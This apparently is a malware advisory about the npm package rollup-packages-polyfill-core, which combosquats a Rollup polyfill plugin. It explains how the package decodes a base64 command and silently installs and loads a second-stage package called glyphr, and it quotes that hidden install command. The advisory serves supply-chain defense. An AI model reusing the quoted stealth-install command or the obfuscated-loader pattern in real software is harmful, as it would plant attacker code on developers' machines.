LWA-2026-5038 confirmed malware

rollup-packages-polyfill-core@0.5.0

Malicious code in rollup-packages-polyfill-core (npm)

T1195.002 · Compromise Software Supply ChainT1059 · Command and Scripting InterpreterT1059.007 · JavaScriptT1105 · Ingress Tool TransferT1074.001 · Local Data StagingT1564.003 · Hidden Window

Analysis

rollup-packages-polyfill-core@0.5.0 combosquats the legitimate rollup-plugin-node-polyfills package. When the exported getPlugin() function is called, it decodes a base64-obfuscated command and silently runs "npm install glyphr --no-save --silent --no-audit --no-fund" via child_process.spawn with stdio suppressed and the process window hidden on Windows. After installation, it loads the glyphr module and invokes its plugin function. This pattern delivers a second-stage payload (the attacker-controlled glyphr package) from the npm registry under stealth conditions, making it a trojanized dependency downloader.

analyzed by
Leitwacht
first seen
Jun 13, 2026, 07:22 AM
analyzed
Jun 13, 2026, 11:39 AM
weekly installs
97

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.